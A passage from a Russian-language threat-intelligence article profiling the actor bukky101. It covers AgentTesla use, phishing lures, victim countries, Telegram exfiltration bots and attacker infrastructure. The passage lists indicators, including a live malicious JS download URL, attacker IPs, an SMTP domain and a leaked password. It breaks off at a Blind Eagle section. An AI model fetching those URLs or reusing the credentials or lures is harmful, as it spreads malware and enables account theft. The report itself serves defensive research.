\u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043b Crypters And Tools.<\/p>\n<p>\u041c\u044b \u043f\u0440\u043e\u0430\u043d\u0430\u043b\u0438\u0437\u0438\u0440\u043e\u0432\u0430\u043b\u0438 \u044d\u0442\u043e\u0433\u043e \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f \u0438 \u0435\u0433\u043e \u0430\u0442\u0430\u043a\u0438. \u041d\u0430\u043f\u0440\u0438\u043c\u0435\u0440, \u0432 \u043c\u0430\u0435 2024 \u0433\u043e\u0434\u0430 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043b \u0432 \u0430\u0442\u0430\u043a\u0435 AgentTesla (SHA-256: 5a8794fa12ff401f9f7212e497d5d877010f493e3bb028abd54cb12f60fc550f). \u0414\u0430\u043d\u043d\u044b\u0435 \u043e\u0442\u043f\u0440\u0430\u0432\u043b\u044f\u043b\u0438\u0441\u044c \u043d\u0430 SMTP \u0441\u0435\u0440\u0432\u0435\u0440 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430 boydjackson[.]org. \u0418\u043d\u0442\u0435\u0440\u0435\u0441\u043d\u043e, \u0447\u0442\u043e \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043b \u043f\u0430\u0440\u043e\u043b\u044c Bukky101@. \u041e\u0434\u043d\u0443 \u0438\u0437 \u0442\u0430\u043a\u0438\u0445 \u0430\u0442\u0430\u043a \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0438 \u043f\u043e\u0434\u0440\u043e\u0431\u043d\u043e \u0440\u0430\u0441\u043f\u0438\u0441\u0430\u043b\u0438<a href=\"https:\/\/blog.delivr.to\/analysis-of-an-agenttesla-pif-sample-ad3785ff1609\"> \u0432 \u0441\u0432\u043e\u0435\u0439 \u0441\u0442\u0430\u0442\u044c\u0435<\/a>.<\/p>\n<p>\u0412\u043e \u0432\u0440\u0435\u043c\u044f \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u043d\u0438\u044f \u043c\u044b \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u043b\u0438 \u043c\u043d\u043e\u0436\u0435\u0441\u0442\u0432\u043e \u0436\u0435\u0440\u0442\u0432 \u0432 \u0440\u0430\u0437\u043d\u044b\u0445 \u0441\u0442\u0440\u0430\u043d\u0430\u0445, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u043f\u043e\u0434\u0432\u0435\u0440\u0433\u043b\u0438\u0441\u044c \u0430\u0442\u0430\u043a\u0435. \u0421\u043f\u0438\u0441\u043e\u043a \u0441\u0442\u0440\u0430\u043d \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0438\u0439: \u0410\u0440\u043c\u0435\u043d\u0438\u044f, \u0413\u0440\u0435\u0446\u0438\u044f, \u0418\u043d\u0434\u0438\u044f, \u0418\u0440\u0430\u043a, \u0418\u0442\u0430\u043b\u0438\u044f, \u041a\u0438\u043f\u0440, \u041a\u043e\u043b\u0443\u043c\u0431\u0438\u044f, \u041c\u0430\u043b\u0430\u0439\u0437\u0438\u044f, \u041e\u0410\u042d, \u041f\u0430\u043a\u0438\u0441\u0442\u0430\u043d, \u0421\u0430\u0443\u0434\u043e\u0432\u0441\u043a\u0430\u044f \u0410\u0440\u0430\u0432\u0438\u044f, \u0421\u0438\u043d\u0433\u0430\u043f\u0443\u0440, \u0422\u0443\u0440\u0446\u0438\u044f.\u00a0<\/p>\n<p>\u0416\u0435\u0440\u0442\u0432\u044b \u0431\u044b\u043b\u0438 \u0438\u0437 \u0441\u043e\u0432\u0435\u0440\u0448\u0435\u043d\u043d\u043e \u0440\u0430\u0437\u043d\u044b\u0445 \u043e\u0442\u0440\u0430\u0441\u043b\u0435\u0439 \u0438 \u043a\u0430\u043a\u043e\u0433\u043e-\u0442\u043e \u043e\u0431\u0449\u0435\u0433\u043e \u043f\u0430\u0442\u0442\u0435\u0440\u043d\u0430 \u0432 \u0442\u043e\u043c, \u043a\u043e\u0433\u043e \u0430\u0442\u0430\u043a\u043e\u0432\u0430\u043b Bukky101, \u0432\u0438\u0434\u043d\u043e \u043d\u0435 \u0431\u044b\u043b\u043e.<\/p>\n<p>\u0412 \u043e\u0434\u043d\u043e\u0439 \u0438\u0437 \u0430\u0442\u0430\u043a \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a \u0437\u0430\u043f\u0443\u0441\u0442\u0438\u043b \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u043e\u0435 \u041f\u041e \u043d\u0430 \u0441\u0432\u043e\u0435\u0439 \u0441\u0438\u0441\u0442\u0435\u043c\u0435, \u044d\u0442\u043e \u043f\u043e\u0437\u0432\u043e\u043b\u0438\u043b\u043e \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u043f\u043e\u043b\u0435\u0437\u043d\u0443\u044e \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u044e, \u0432\u043a\u043b\u044e\u0447\u0430\u044f:<\/p>\n<ul>\n<li>\n<p>\u0431\u0443\u0444\u0435\u0440 \u043e\u0431\u043c\u0435\u043d\u0430<\/p>\n<\/li>\n<li>\n<p>\u0443\u0441\u0442\u0430\u043d\u043e\u0432\u043b\u0435\u043d\u043d\u044b\u0435 \u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u0438\u044f<\/p>\n<\/li>\n<li>\n<p>\u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u044e \u043e\u0431 \u0441\u0438\u0441\u0442\u0435\u043c\u0435, \u0432\u043a\u043b\u044e\u0447\u0430\u044f IP, \u043d\u0430\u043b\u0438\u0447\u0438\u0435 \u0430\u043d\u0442\u0438\u0432\u0438\u0440\u0443\u0441\u043e\u0432, \u044d\u043c\u0443\u043b\u044f\u0442\u043e\u0440\u043e\u0432 \u0438 \u043f\u0435\u0441\u043e\u0447\u043d\u0438\u0446<\/p>\n<\/li>\n<li>\n<p>\u043a\u043b\u044e\u0447\u0438 windows<\/p>\n<\/li>\n<li>\n<p>\u0438\u0441\u0442\u043e\u0440\u0438\u044e \u0431\u0440\u0430\u0443\u0437\u0435\u0440\u043e\u0432<\/p>\n<\/li>\n<li>\n<p>\u0438\u0441\u0442\u043e\u0440\u0438\u044e \u0441\u043a\u0430\u0447\u0438\u0432\u0430\u043d\u0438\u0439<\/p>\n<\/li>\n<li>\n<p>\u0442\u043e\u043f \u043f\u043e\u0441\u0435\u0449\u0451\u043d\u043d\u044b\u0445 \u0441\u0430\u0439\u0442\u043e\u0432<\/p>\n<\/li>\n<li>\n<p>\u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u044e \u043e \u0441\u0435\u0441\u0441\u0438\u044f\u0445, \u043d\u0430\u043f\u0440\u0438\u043c\u0435\u0440 Telegram \u0438 Skype<\/p>\n<\/li>\n<li>\n<p>\u0421\u043f\u0438\u0441\u043a\u0438 wifi \u0441 \u0438\u043c\u0435\u043d\u0430\u043c\u0438 \u0438 \u043f\u0430\u0440\u043e\u043b\u044f\u043c\u0438<\/p>\n<\/li>\n<\/ul>\n<p>\u0422\u0430\u043a\u0438\u043c \u043e\u0431\u0440\u0430\u0437\u043e\u043c, \u043c\u044b \u0442\u043e\u0447\u043d\u043e \u0432\u044b\u044f\u0441\u043d\u0438\u043b\u0438, \u0447\u0442\u043e \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a Bukky101 \u0438\u0437 \u041d\u0438\u0433\u0435\u0440\u0438\u0438. \u041e\u0431 \u044d\u0442\u043e\u043c \u0433\u043e\u0432\u043e\u0440\u0438\u0442 \u043d\u0435 \u0442\u043e\u043b\u044c\u043a\u043e IP, \u043d\u043e \u0438 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435 Airtel Nigeria.<\/p>\n<p>\u041f\u043e\u043c\u0438\u043c\u043e \u044d\u0442\u043e\u0433\u043e, \u043c\u044b \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u043b\u0438, \u0447\u0442\u043e \u0445\u0430\u043a\u0435\u0440 \u043c\u0430\u0441\u0441\u043e\u0432\u043e \u043f\u043e\u0441\u044b\u043b\u0430\u043b \u043f\u0438\u0441\u044c\u043c\u0430 \u0432 \u0440\u0430\u0437\u043b\u0438\u0447\u043d\u044b\u0435 \u0441\u0442\u0440\u0430\u043d\u044b. \u041d\u0430 \u043c\u043e\u043c\u0435\u043d\u0442 \u0444\u0435\u0432\u0440\u0430\u043b\u044f 2025 \u0433\u043e\u0434\u0430, \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a \u043f\u043e\u0441\u043b\u0430\u043b \u0431\u043e\u043b\u0435\u0435 6160 \u0440\u0430\u0437\u043b\u0438\u0447\u043d\u044b\u0445 \u043f\u0438\u0441\u0435\u043c \u0432 \u0440\u0430\u0437\u043d\u044b\u0435 \u0441\u0442\u0440\u0430\u043d\u044b. \u041f\u0440\u0438\u0432\u0435\u0434\u0451\u043c \u043d\u0435\u0441\u043a\u043e\u043b\u044c\u043a\u043e \u043f\u0440\u0438\u043c\u0435\u0440\u043e\u0432 \u043d\u0430\u0437\u0432\u0430\u043d\u0438\u0439 \u0442\u0430\u043a\u0438\u0445 \u043f\u0438\u0441\u0435\u043c \u0438 \u0440\u0430\u0437\u043b\u0438\u0447\u0438\u0435 \u0442\u0435\u043c \u0444\u0438\u0448\u0438\u043d\u0433\u0430:<\/p>\n<ul>\n<li>\n<p>DETAIL OF H Sale order # 128578 (PAKISTAN.PACKAGES)<\/p>\n<\/li>\n<li>\n<p>Position for the Head of IT \/ Manager IT<\/p>\n<\/li>\n<li>\n<p>\u041f\u0440\u0430\u0439\u0441 \u043b\u0438\u0441\u0442 \u043d\u0430 \u043f\u0440\u043e\u0434\u0443\u043a\u0446\u0438\u044e<\/p>\n<\/li>\n<li>\n<p>\u0645\u062d\u0627\u0643\u0645 \u0631\u0627\u0633 \u0627\u0644\u062e\u064a\u0645\u0629 \u0625\u0639\u0644\u0627\u0646:3100134384<\/p>\n<\/li>\n<li>\n<p>[Gabrini Cosmetics]: New order #80464<\/p>\n<\/li>\n<li>\n<p>Re: Proposal of Stall Design and Fabrication for AAHAR Expo 04-08 March 2025 (New delhi)<\/p>\n<\/li>\n<li>\n<p>\u2705 \u041d\u043e\u0432 \u0442\u0435\u0440\u043c\u0438\u043d \u0437\u0430 \u0440\u0430\u0431\u043e\u0442\u0438\u043b\u043d\u0438\u0446\u0430: \u041f\u043e\u0441\u043b\u0435\u0434\u043d\u0438 \u0438\u0437\u043c\u0435\u043d\u0438 \u043d\u0430 \u0417\u0430\u043a\u043e\u043d\u043e\u0442 \u0437\u0430 \u0458\u0430\u0432\u043d\u0438 \u043d\u0430\u0431\u0430\u0432\u043a\u0438, \u0430\u043a\u0442\u0443\u0435\u043b\u043d\u0438 \u0442\u0435\u043c\u0438 \u0438 \u043f\u0440\u0435\u0434\u0438\u0437\u0432\u0438\u0446\u0438<\/p>\n<\/li>\n<li>\n<p>Ata\u0219ez \u0219i poze cu , coletul ce mi-a ajuns , \u0219i factura l\u00e2ng\u0103<\/p>\n<\/li>\n<li>\n<p>Factura fiscala cutii carton_22.11.2024<\/p>\n<\/li>\n<li>\n<p>Dit verandert er in de tarieven en voorwaarden op ons platform<\/p>\n<\/li>\n<li>\n<p>REQUEST FOR PROPOSAL FOR WORLD VISION ZIMBABWE<\/p>\n<\/li>\n<\/ul>\n<figure class=\"full-width\"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/eab\/7a4\/441\/eab7a4441221319f09351cd066592e78.png\" alt=\"\u0420\u0438\u0441\u0443\u043d\u043e\u043a 28. \u041f\u0440\u0438\u043c\u0435\u0440 \u043f\u0438\u0441\u044c\u043c\u0430 \u043e\u0442 bukky101\" title=\"\u0420\u0438\u0441\u0443\u043d\u043e\u043a 28. \u041f\u0440\u0438\u043c\u0435\u0440 \u043f\u0438\u0441\u044c\u043c\u0430 \u043e\u0442 bukky101\" width=\"1016\" height=\"984\" sizes=\"auto, (max-width: 780px) 100vw, 50vw\" srcset=\"https:\/\/habrastorage.org\/r\/w780\/getpro\/habr\/upload_files\/eab\/7a4\/441\/eab7a4441221319f09351cd066592e78.png 780w,&#10;       https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/eab\/7a4\/441\/eab7a4441221319f09351cd066592e78.png 781w\" loading=\"lazy\" decode=\"async\"\/><\/p>\n<div><figcaption>\u0420\u0438\u0441\u0443\u043d\u043e\u043a 28. \u041f\u0440\u0438\u043c\u0435\u0440 \u043f\u0438\u0441\u044c\u043c\u0430 \u043e\u0442 bukky101<\/figcaption><\/div>\n<\/figure>\n<p>\u0411\u043e\u043b\u044c\u0448\u0438\u043d\u0441\u0442\u0432\u043e \u043f\u0438\u0441\u0435\u043c \u0441\u043e\u0434\u0435\u0440\u0436\u0430\u043b\u0438 html \u0441 \u0443\u0436\u0435 \u0432\u0432\u0435\u0434\u0435\u043d\u043d\u044b\u043c \u043b\u043e\u0433\u0438\u043d\u043e\u043c \u043f\u043e\u0442\u0435\u043d\u0446\u0438\u0430\u043b\u044c\u043d\u043e\u0439 \u0436\u0435\u0440\u0442\u0432\u044b. \u041a\u0430\u043a \u0442\u043e\u043b\u044c\u043a\u043e \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044c \u0432\u0432\u043e\u0434\u0438\u043b \u043f\u0430\u0440\u043e\u043b\u044c \u0432 \u0444\u043e\u0440\u043c\u0443, \u0442\u043e \u0432\u044b\u0434\u0430\u0451\u0442 \u043e\u0448\u0438\u0431\u043a\u0443, \u0447\u0442\u043e \u043f\u0430\u0440\u043e\u043b\u044c \u043d\u0435 \u0434\u0435\u0439\u0441\u0442\u0432\u0438\u0442\u0435\u043b\u0435\u043d, \u0430 \u0432 \u0442\u043e\u0436\u0435 \u0432\u0440\u0435\u043c\u044f \u043f\u043e\u0441\u044b\u043b\u0430\u0435\u0442\u0441\u044f \u0437\u0430\u043f\u0440\u043e\u0441 \u0432 \u0442\u0435\u043b\u0435\u0433\u0440\u0430\u043c \u0431\u043e\u0442, \u043d\u043e \u043f\u0440\u0438\u043d\u0430\u0434\u043b\u0435\u0436\u0430\u0449\u0438\u0439 \u0443\u0436\u0435 \u0434\u0440\u0443\u0433\u043e\u043c\u0443 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044e &#8212; @Gfcafmin.<\/p>\n<figure class=\"full-width\"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/c33\/f40\/003\/c33f40003cf456d0f3ab9b600dab94f1.png\" alt=\"\u0420\u0438\u0441\u0443\u043d\u043e\u043a 29. HTML-\u0434\u043e\u043a\u0443\u043c\u0435\u043d\u0442 \u0441 \u0432\u0432\u0435\u0434\u0451\u043d\u043d\u044b\u043c \u043b\u043e\u0433\u0438\u043d\u043e\u043c bukky101\" title=\"\u0420\u0438\u0441\u0443\u043d\u043e\u043a 29. HTML-\u0434\u043e\u043a\u0443\u043c\u0435\u043d\u0442 \u0441 \u0432\u0432\u0435\u0434\u0451\u043d\u043d\u044b\u043c \u043b\u043e\u0433\u0438\u043d\u043e\u043c bukky101\" width=\"1617\" height=\"854\" sizes=\"auto, (max-width: 780px) 100vw, 50vw\" srcset=\"https:\/\/habrastorage.org\/r\/w780\/getpro\/habr\/upload_files\/c33\/f40\/003\/c33f40003cf456d0f3ab9b600dab94f1.png 780w,&#10;       https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/c33\/f40\/003\/c33f40003cf456d0f3ab9b600dab94f1.png 781w\" loading=\"lazy\" decode=\"async\"\/><\/p>\n<div><figcaption>\u0420\u0438\u0441\u0443\u043d\u043e\u043a 29. HTML-\u0434\u043e\u043a\u0443\u043c\u0435\u043d\u0442 \u0441 \u0432\u0432\u0435\u0434\u0451\u043d\u043d\u044b\u043c \u043b\u043e\u0433\u0438\u043d\u043e\u043c bukky101<\/figcaption><\/div>\n<\/figure>\n<p>\u0422\u0430\u043a\u0436\u0435 \u043c\u044b \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u043b\u0438 \u043e\u0442\u043a\u0440\u044b\u0442\u0443\u044e \u0434\u0438\u0440\u0435\u043a\u0442\u043e\u0440\u0438\u044e, \u043f\u0440\u0438\u043d\u0430\u0434\u043b\u0435\u0436\u0430\u0449\u0443\u044e \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044e bukky101 \u0441 IP 37.49.228.234, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u0443\u043f\u043e\u043c\u0438\u043d\u0430\u043b\u0430\u0441\u044c<a href=\"https:\/\/x.com\/DonPasci\/status\/1764696154212602346\"> \u0432 \u0441\u043e\u0446\u0441\u0435\u0442\u0438 X<\/a>.<\/p>\n<figure class=\"\"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/047\/441\/485\/047441485f5b3715c312407280aad6c0.png\" alt=\"\u0420\u0438\u0441\u0443\u043d\u043e\u043a 30. \u041e\u0442\u043a\u0440\u044b\u0442\u0430\u044f \u0434\u0438\u0440\u0435\u043a\u0442\u043e\u0440\u0438\u044f \u0441\u0435\u0440\u0432\u0435\u0440\u0430 37.49.228.234 \u043f\u0440\u0438\u043d\u0430\u0434\u043b\u0435\u0436\u0430\u0449\u0430\u044f bukky101\" title=\"\u0420\u0438\u0441\u0443\u043d\u043e\u043a 30. \u041e\u0442\u043a\u0440\u044b\u0442\u0430\u044f \u0434\u0438\u0440\u0435\u043a\u0442\u043e\u0440\u0438\u044f \u0441\u0435\u0440\u0432\u0435\u0440\u0430 37.49.228.234 \u043f\u0440\u0438\u043d\u0430\u0434\u043b\u0435\u0436\u0430\u0449\u0430\u044f bukky101\" width=\"375\" height=\"450\" sizes=\"auto, (max-width: 780px) 100vw, 50vw\" srcset=\"https:\/\/habrastorage.org\/r\/w780\/getpro\/habr\/upload_files\/047\/441\/485\/047441485f5b3715c312407280aad6c0.png 780w,&#10;       https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/047\/441\/485\/047441485f5b3715c312407280aad6c0.png 781w\" loading=\"lazy\" decode=\"async\"\/><\/p>\n<div><figcaption>\u0420\u0438\u0441\u0443\u043d\u043e\u043a 30. \u041e\u0442\u043a\u0440\u044b\u0442\u0430\u044f \u0434\u0438\u0440\u0435\u043a\u0442\u043e\u0440\u0438\u044f \u0441\u0435\u0440\u0432\u0435\u0440\u0430 37.49.228.234 \u043f\u0440\u0438\u043d\u0430\u0434\u043b\u0435\u0436\u0430\u0449\u0430\u044f bukky101<\/figcaption><\/div>\n<\/figure>\n<p>\u0412\u043e \u0432\u0440\u0435\u043c\u044f \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u043d\u0438\u044f bukky101 \u043c\u044b \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u043b\u0438, \u0447\u0442\u043e \u043e\u043d \u0441\u043e\u0442\u0440\u0443\u0434\u043d\u0438\u0447\u0430\u0435\u0442 \u0441 \u043c\u043d\u043e\u0436\u0435\u0441\u0442\u0432\u043e\u043c \u043b\u044e\u0434\u0435\u0439 \u0438\u0437 \u0442\u0435\u043d\u0435\u0432\u043e\u0433\u043e \u0441\u043e\u043e\u0431\u0449\u0435\u0441\u0442\u0432\u0430. \u0422\u0430\u043a, \u043e\u0434\u0438\u043d \u0438\u0437 \u0442\u0435\u0445, \u043a\u0442\u043e \u0441\u043e\u0442\u0440\u0443\u0434\u043d\u0438\u0447\u0430\u043b \u0441 bukky101 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043b \u0441\u0435\u0440\u0432\u0435\u0440 185.38.142.224, \u0434\u043b\u044f \u043e\u0442\u043f\u0440\u0430\u0432\u043a\u0438 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0445 email \u043f\u043e \u0432\u0441\u0435\u043c\u0443 \u043c\u0438\u0440\u0443. \u041f\u043e \u043d\u0430\u0448\u0438\u043c \u0434\u0430\u043d\u043d\u044b\u043c \u0441 \u044d\u0442\u043e\u0433\u043e IP \u0431\u044b\u043b\u043e \u043e\u0442\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u043e \u043f\u043e \u043a\u0440\u0430\u0439\u043d\u0435\u0439 \u043c\u0435\u0440\u0435 60300 \u043f\u0438\u0441\u0435\u043c \u0432 \u0442\u0435\u0447\u0435\u043d\u0438\u0435 \u0441\u0443\u0442\u043e\u043a.<\/p>\n<p>\u041e\u0434\u043d\u043e \u0438\u0437 \u0442\u0430\u043a\u0438\u0445 \u043f\u0438\u0441\u0435\u043c \u0432\u044b\u0433\u043b\u044f\u0434\u0435\u043b\u043e \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0438\u043c \u043e\u0431\u0440\u0430\u0437\u043e\u043c:<\/p>\n<figure class=\"full-width\"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/23d\/c2c\/f50\/23dc2cf50cab0fb3c72de0264c61340c.png\" alt=\"\u0420\u0438\u0441\u0443\u043d\u043e\u043a 31. \u0412\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u043e\u0435 \u043f\u0438\u0441\u044c\u043c\u043e \u043e\u0442 \u043e\u0434\u043d\u043e\u0433\u043e \u0438\u0437 \u0441\u043e\u043e\u0431\u0449\u043d\u0438\u043a\u043e\u0432 bukky101\" title=\"\u0420\u0438\u0441\u0443\u043d\u043e\u043a 31. \u0412\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u043e\u0435 \u043f\u0438\u0441\u044c\u043c\u043e \u043e\u0442 \u043e\u0434\u043d\u043e\u0433\u043e \u0438\u0437 \u0441\u043e\u043e\u0431\u0449\u043d\u0438\u043a\u043e\u0432 bukky101\" width=\"700\" height=\"604\" sizes=\"auto, (max-width: 780px) 100vw, 50vw\" srcset=\"https:\/\/habrastorage.org\/r\/w780\/getpro\/habr\/upload_files\/23d\/c2c\/f50\/23dc2cf50cab0fb3c72de0264c61340c.png 780w,&#10;       https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/23d\/c2c\/f50\/23dc2cf50cab0fb3c72de0264c61340c.png 781w\" loading=\"lazy\" decode=\"async\"\/><\/p>\n<div><figcaption>\u0420\u0438\u0441\u0443\u043d\u043e\u043a 31. \u0412\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u043e\u0435 \u043f\u0438\u0441\u044c\u043c\u043e \u043e\u0442 \u043e\u0434\u043d\u043e\u0433\u043e \u0438\u0437 \u0441\u043e\u043e\u0431\u0449\u043d\u0438\u043a\u043e\u0432 bukky101<\/figcaption><\/div>\n<\/figure>\n<p>\u041f\u0440\u0438 \u043d\u0430\u0436\u0430\u0442\u0438\u0438 \u043d\u0430 \u0441\u0441\u044b\u043b\u043a\u0443, \u043f\u0440\u043e\u0438\u0441\u0445\u043e\u0434\u0438\u0442 \u0441\u043a\u0430\u0447\u0438\u0432\u0430\u043d\u0438\u0435 JS \u0444\u0430\u0439\u043b\u0430 \u0441\u043e \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0435\u0433\u043e \u0441\u0430\u0439\u0442\u0430:<\/p>\n<ul>\n<li>\n<p>https:\/\/21ninety.info\/file\/Purchase-Order.js<\/p>\n<\/li>\n<\/ul>\n<p>\u042d\u0442\u043e\u0442 \u0441\u043a\u0440\u0438\u043f\u0442 \u0441\u043a\u0430\u0447\u0438\u0432\u0430\u043b \u0434\u0430\u043d\u043d\u044b\u0435 \u0441 <a href=\"http:\/\/paste.ee\">paste.ee<\/a>, \u0430 \u0437\u0430\u0442\u0435\u043c \u043e\u0431\u0440\u0430\u0449\u0430\u043b\u0441\u044f \u0447\u0435\u0440\u0435\u0437 API \u043d\u0430 \u0441\u0435\u0440\u0432\u0435\u0440 CryptersAndTools \u0434\u043b\u044f \u043f\u043e\u043b\u0443\u0447\u0435\u043d\u0438\u044f \u0434\u0430\u043b\u044c\u043d\u0435\u0439\u0448\u0435\u0439 \u043d\u0430\u0433\u0440\u0443\u0437\u043a\u0438:<\/p>\n<ul>\n<li>\n<p>3005.filemail.com\/api\/file\/get?filekey=<\/p>\n<\/li>\n<\/ul>\n<p>\u0412 \u043f\u043e\u0441\u043b\u0435\u0434\u0441\u0442\u0432\u0438\u0438 \u0434\u0430\u043d\u043d\u044b\u0435 \u0432\u044b\u0433\u0440\u0443\u0436\u0430\u043b\u0438\u0441\u044c \u0432 \u0442\u0435\u043b\u0435\u0433\u0440\u0430\u043c \u0431\u043e\u0442, \u043f\u0440\u0438\u043d\u0430\u0434\u043b\u0435\u0436\u0430\u0449\u0438\u0439 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044e To The World Master Solution &#8212; @Mastersolution2.<\/p>\n<p>\u0423 \u043d\u0430\u0441 \u0435\u0441\u0442\u044c \u0433\u0438\u043f\u043e\u0442\u0435\u0437\u0430, \u0447\u0442\u043e bukky101 \u043c\u043e\u0436\u0435\u0442 \u0431\u044b\u0442\u044c \u0441\u0432\u044f\u0437\u0430\u043d \u0441 \u043e\u0434\u043d\u043e\u0439 \u0438\u0437 \u0433\u0440\u0443\u043f\u043f\u0438\u0440\u043e\u0432\u043e\u043a Aggah, TA558 \u0438 Blind Eagle, \u043d\u043e \u0434\u0430\u043d\u043d\u044b\u0445 \u0434\u043b\u044f \u043e\u0434\u043d\u043e\u0437\u043d\u0430\u0447\u043d\u043e\u0433\u043e \u0432\u044b\u0432\u043e\u0434\u0430 \u043f\u043e\u043a\u0430 \u043d\u0435\u0434\u043e\u0441\u0442\u0430\u0442\u043e\u0447\u043d\u043e.<\/p>\n<p>\u041f\u043e\u043c\u0438\u043c\u043e \u044d\u0442\u043e\u0433\u043e,<a href=\"https:\/\/medium.com\/@paul.k.burbage\/aggah-not-exactly-apt-5e51aaff95f5\"> \u0440\u0430\u043d\u0435\u0435 \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0438 \u043f\u0438\u0441\u0430\u043b\u0438<\/a> \u043e \u0441\u0432\u044f\u0437\u044f\u0445 \u0433\u0440\u0443\u043f\u043f\u0438\u0440\u043e\u0432\u043a\u0438 Aggah \u0438 \u043d\u0438\u0433\u0438\u0440\u0438\u0439\u0441\u043a\u0438\u0445 \u0445\u0430\u043a\u0435\u0440\u0430\u0445. \u0412 \u0441\u0442\u0430\u0442\u044c\u0435 \u0433\u043e\u0432\u043e\u0440\u0438\u043b\u043e\u0441\u044c, \u0447\u0442\u043e \u043d\u0438\u0433\u0438\u0440\u0438\u0439\u0441\u043a\u0438\u0435 \u0445\u0430\u043a\u0435\u0440\u044b \u0437\u0430\u0438\u043c\u0441\u0442\u0432\u043e\u0432\u0430\u043b\u0438 \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442\u0430\u0440\u0438\u0439 \u0434\u043b\u044f \u0430\u0442\u0430\u043a \u0443 \u0433\u0440\u0443\u043f\u043f \u0438\u0437 \u041f\u0430\u043a\u0438\u0441\u0442\u0430\u043d\u0430, \u0430 \u0438\u043c\u0435\u043d\u043d\u043e \u2013 \u0443 Aggah, \u0447\u0442\u043e \u0447\u0430\u0441\u0442\u0438\u0447\u043d\u043e \u0441\u043e\u043e\u0442\u043d\u043e\u0441\u0438\u0442\u0441\u044f \u0441 \u043e\u043f\u0438\u0441\u0430\u043d\u043d\u044b\u043c\u0438 \u0432\u044b\u0448\u0435 \u0444\u0430\u043a\u0442\u0430\u043c\u0438.<\/p>\n<p><a class=\"anchor\" name=\"7.2\" id=\"7.2\"><\/a><\/p>\n<h3>7.2 Blind Eagle: deadpoolstart2025 \u0438 abbas<\/h3>\n<p>\u0412 \u043f\u0440\u043e\u0446\u0435\u0441\u0441\u0435 \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u043d\u0438\u044f \u0433\u0440\u0443\u043f\u043f\u0438\u0440\u043e\u0432\u043a\u0438 Blind Eagle \u043c\u044b \u043d\u0430\u0442\u043a\u043d\u0443\u043b\u0438\u0441\u044c \u043d\u0430 \u0441\u0435\u0440\u0432\u0435\u0440 181.71.217.114, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u043f\u0440\u0438\u043d\u0430\u0434\u043b\u0435\u0436\u0438\u0442 \u043f\u0440\u0438\u0432\u044b\u0447\u043d\u043e\u0439 \u0434\u043b\u044f Blind Eagle ASN Colombia Movil (AS 27831). \u0418\u0437 \u0434\u043e\u043c\u0435\u043d\u043e\u0432, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0440\u0435\u0437\u043e\u043b\u0432\u0438\u043b\u0438\u0441\u044c \u0432 \u044d\u0442\u043e\u0442 IP \u0431\u043e\u043b\u044c\u0448\u0438\u043d\u0441\u0442\u0432\u043e \u0438\u043c\u0435\u043b\u0438 